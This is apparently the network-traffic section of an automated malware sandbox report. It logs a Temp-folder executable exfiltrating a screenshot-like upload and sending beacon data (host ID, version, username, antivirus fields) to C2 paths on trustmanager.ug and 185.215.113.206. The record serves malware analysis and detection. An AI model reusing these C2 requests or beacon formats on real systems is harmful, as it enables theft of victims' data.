65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.742125988 CEST	16035	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:02.753321886 CEST	16035	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:02.753406048 CEST	16036	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:02.753563881 CEST	16046	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:02.753662109 CEST	16048	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:02.780153036 CEST	16062	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:02.780239105 CEST	16075	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:02.806405067 CEST	16105	OUT	Data Raw: f9 7a 6c bd 63 02 9a 74 bd 3a 41 f2 b6 da cf 57 3e 94 f5 73 53 c9 25 b3 2d 54 83 de 25 93 a0 40 df 72 5a 89 fc 3b 27 f0 48 0d 0b 2b 03 c1 35 2a dd 4a 3f 8c d1 7a ab a8 72 50 7b c4 a6 fa 1d d2 f4 50 6a 16 d3 6e 53 ac 4d 5a eb 7d 30 ea d5 32 ea 2f Data Ascii: zlct:AW>sS%-T%@rZ;'H+5*J?zrP{PjnSMZ}02/Gzdv5DO>`)^kW\|V;qBr\R$pjLLVGu.(RQbu2DPbv).}cuZxm$iR
Aug 23, 2021 02:09:02.806512117 CEST	16115	OUT	Data Raw: a2 81 05 14 b4 53 40 18 a3 14 b4 76 a0 42 52 d1 47 6a 00 43 45 1d e8 34 00 51 40 a5 a0 00 53 a9 a2 9d 4c 4c 28 a5 a4 a0 42 8a 5a 41 4b 4c 41 4a 29 29 7b d3 01 68 a2 8a 62 0a 4a 0d 14 86 02 96 92 94 50 02 d1 de 8a 3b d5 08 75 28 a4 a0 53 24 70 a7 Data Ascii: S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJP;u(S$pSA4LC3LCKhqXvh6E\9I3Fj=q9I@5IMRo7)hYKnisN)S3LCsL-aRQ@)5B.i.+\ii))iM
Aug 23, 2021 02:09:02.831824064 CEST	16128	OUT	Data Raw: 8e 93 58 95 6f 23 d1 c2 e9 4e e5 68 26 59 2e 16 0b 9d 3d ed a5 6f bb 9f b8 dd fe 56 52 47 40 4e 0e 0f b5 43 af 78 72 c7 c4 3a 45 ce 8f 79 24 d1 c3 70 a0 39 85 c0 61 86 04 75 07 ba fa 55 e2 1a fe c5 f6 b0 59 56 46 d8 c4 70 ae 8e 40 3f 4c 8f ca a9 Data Ascii: Xo#Nh&Y.=oVRG@NCxr:Ey$p9auUYVFp@?Ls$/1uTgfT;+{iY_n9\|Qno..#YrJgp_)&,a8xzPmZJZB(#{kK[mhcPH8IkN,</]WIe5
Aug 23, 2021 02:09:02.858660936 CEST	16130	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.858680964 CEST	16130	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.3	49792	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.898993969 CEST	16131	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:02.924784899 CEST	16145	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.924802065 CEST	16146	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.3	49791	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.922804117 CEST	16131	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:02.922894001 CEST	16131	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:02.923017025 CEST	16141	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:02.923089981 CEST	16144	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:02.979151011 CEST	16148	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:02.979537964 CEST	16151	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
